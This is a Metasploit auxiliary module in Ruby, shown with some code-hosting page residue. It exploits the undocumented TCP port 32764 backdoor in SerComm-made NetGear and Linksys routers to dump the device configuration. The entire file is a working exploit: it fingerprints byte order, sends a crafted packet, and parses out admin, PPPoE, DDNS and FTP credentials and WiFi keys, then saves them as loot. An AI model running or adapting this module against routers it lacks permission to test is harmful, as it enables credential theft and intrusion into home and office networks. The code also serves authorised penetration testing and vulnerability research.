261 lines
6.6 KiB
Ruby
261 lines
6.6 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core/auxiliary/report'
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Auxiliary::Report
|
|
|
|
SETTINGS = {
|
|
'Creds' => [
|
|
[ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ],
|
|
[ 'HTTP Web Management Login', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ],
|
|
[ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],
|
|
[ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ],
|
|
[ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ],
|
|
[ 'CMS', {'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras
|
|
[ 'BigPondAuth', {'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra
|
|
[ 'L2TP', { 'user' => /l2tp_username=(\S+)/i, 'pass' => /l2tp_password=(\S+)/i } ],
|
|
[ 'FTP', { 'user' => /ftp_login=(\S+)/i, 'pass' => /ftp_password=(\S+)/i } ],
|
|
],
|
|
'General' => [
|
|
['Wifi SSID', /wifi_ssid=(\S+)/i],
|
|
['Wifi Key 1', /wifi_key1=(\S+)/i],
|
|
['Wifi Key 2', /wifi_key2=(\S+)/i],
|
|
['Wifi Key 3', /wifi_key3=(\S+)/i],
|
|
['Wifi Key 4', /wifi_key4=(\S+)/i],
|
|
['Wifi PSK PWD', /wifi_psk_pwd=(\S+)/i]
|
|
]
|
|
}
|
|
|
|
attr_accessor :endianess
|
|
attr_accessor :credentials
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "SerComm Device Configuration Dump",
|
|
'Description' => %q{
|
|
This module will dump the configuration of several SerComm devices. These devices
|
|
typically include routers from NetGear and Linksys. This module was tested
|
|
successfully against the NetGear DG834 series ADSL modem router.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
|
|
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '101653' ],
|
|
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
|
|
],
|
|
'DisclosureDate' => "Dec 31 2013" ))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(32764),
|
|
])
|
|
end
|
|
|
|
def run
|
|
print_status("Attempting to connect and check endianess...")
|
|
@endianess = fingerprint_endian
|
|
@credentials = {}
|
|
|
|
if endianess.nil?
|
|
print_error("Failed to check endianess, aborting...")
|
|
return
|
|
end
|
|
print_good("#{string_endianess} device found...")
|
|
|
|
print_status("Attempting to connect and dump configuration...")
|
|
config = dump_configuration
|
|
|
|
if config.nil?
|
|
print_status("Error retrieving configuration, aborting...")
|
|
return
|
|
end
|
|
|
|
loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations")
|
|
print_good("Router configuration dump stored in: #{loot_file}")
|
|
|
|
parse_configuration(config[:data])
|
|
end
|
|
|
|
def report_cred(opts)
|
|
service_data = {
|
|
address: opts[:ip],
|
|
port: opts[:port],
|
|
service_name: opts[:service_name],
|
|
protocol: 'tcp',
|
|
workspace_id: myworkspace_id
|
|
}
|
|
|
|
credential_data = {
|
|
origin_type: :service,
|
|
module_fullname: fullname,
|
|
username: opts[:user],
|
|
private_data: opts[:password],
|
|
private_type: :password
|
|
}.merge(service_data)
|
|
|
|
login_data = {
|
|
core: create_credential(credential_data),
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
proof: opts[:proof]
|
|
}.merge(service_data)
|
|
|
|
create_credential_login(login_data)
|
|
end
|
|
|
|
private
|
|
|
|
def little_endian?
|
|
return endianess == 'LE'
|
|
end
|
|
|
|
def big_endian?
|
|
return endianess == 'BE'
|
|
end
|
|
|
|
def string_endianess
|
|
if little_endian?
|
|
return "Little Endian"
|
|
elsif big_endian?
|
|
return "Big Endian"
|
|
end
|
|
|
|
return nil
|
|
end
|
|
|
|
|
|
def fingerprint_endian
|
|
begin
|
|
connect
|
|
sock.put(Rex::Text.rand_text(5))
|
|
res = sock.get_once(-1, 10)
|
|
disconnect
|
|
rescue Rex::ConnectionError => e
|
|
print_error("Connection failed: #{e.class}: #{e}")
|
|
return nil
|
|
end
|
|
|
|
unless res
|
|
return nil
|
|
end
|
|
|
|
if res.start_with?("MMcS")
|
|
return 'BE'
|
|
elsif res.start_with?("ScMM")
|
|
return 'LE'
|
|
end
|
|
|
|
return nil
|
|
end
|
|
|
|
def dump_configuration
|
|
if big_endian?
|
|
pkt = [0x4d4d6353, 0x01, 0x00].pack("NVV")
|
|
elsif little_endian?
|
|
pkt = [0x4d4d6353, 0x01, 0x00].pack("VNN")
|
|
else
|
|
return nil
|
|
end
|
|
|
|
connect
|
|
sock.put(pkt)
|
|
res = sock.get_once(-1, 10)
|
|
|
|
disconnect
|
|
|
|
if res.blank?
|
|
vprint_error("No answer...")
|
|
return
|
|
end
|
|
|
|
if big_endian?
|
|
mark, zero, length, data = res.unpack("NVVa*")
|
|
else
|
|
mark, zero, length, data = res.unpack("VNNa*")
|
|
end
|
|
|
|
unless mark == 0x4d4d6353
|
|
vprint_error("Incorrect mark when reading response")
|
|
return nil
|
|
end
|
|
|
|
unless zero == 0
|
|
vprint_error("Incorrect zero when reading response")
|
|
return nil
|
|
end
|
|
|
|
unless length == data.length
|
|
vprint_warning("Inconsistent length / data packet")
|
|
# return nil
|
|
end
|
|
|
|
return { :length => length, :data => data }
|
|
end
|
|
|
|
def parse_configuration(data)
|
|
configs = data.split(?\x00)
|
|
|
|
if datastore['VERBOSE']
|
|
vprint_status('All configuration values:')
|
|
configs.sort.each do |i|
|
|
if i.strip.match(/.*=\S+/)
|
|
vprint_status(i)
|
|
end
|
|
end
|
|
end
|
|
|
|
configs.each do |config|
|
|
parse_general_config(config)
|
|
parse_auth_config(config)
|
|
end
|
|
|
|
@credentials.each do |k,v|
|
|
next unless v[:user] and v[:password]
|
|
print_good("#{k}: User: #{v[:user]} Pass: #{v[:password]}")
|
|
report_cred(
|
|
ip: rhost,
|
|
port: rport,
|
|
user: v[:user],
|
|
password: v[:password],
|
|
service_name: 'sercomm',
|
|
proof: v.inspect
|
|
)
|
|
end
|
|
|
|
end
|
|
|
|
def parse_general_config(config)
|
|
SETTINGS['General'].each do |regex|
|
|
if config.match(regex[1])
|
|
value = $1
|
|
print_status("#{regex[0]}: #{value}")
|
|
end
|
|
end
|
|
end
|
|
|
|
def parse_auth_config(config)
|
|
SETTINGS['Creds'].each do |cred|
|
|
@credentials[cred[0]] = {} unless @credentials[cred[0]]
|
|
|
|
# find the user/pass
|
|
if config.match(cred[1]['user'])
|
|
@credentials[cred[0]][:user] = $1
|
|
end
|
|
|
|
if config.match(cred[1]['pass'])
|
|
@credentials[cred[0]][:password] = $1
|
|
end
|
|
|
|
end
|
|
end
|
|
end
|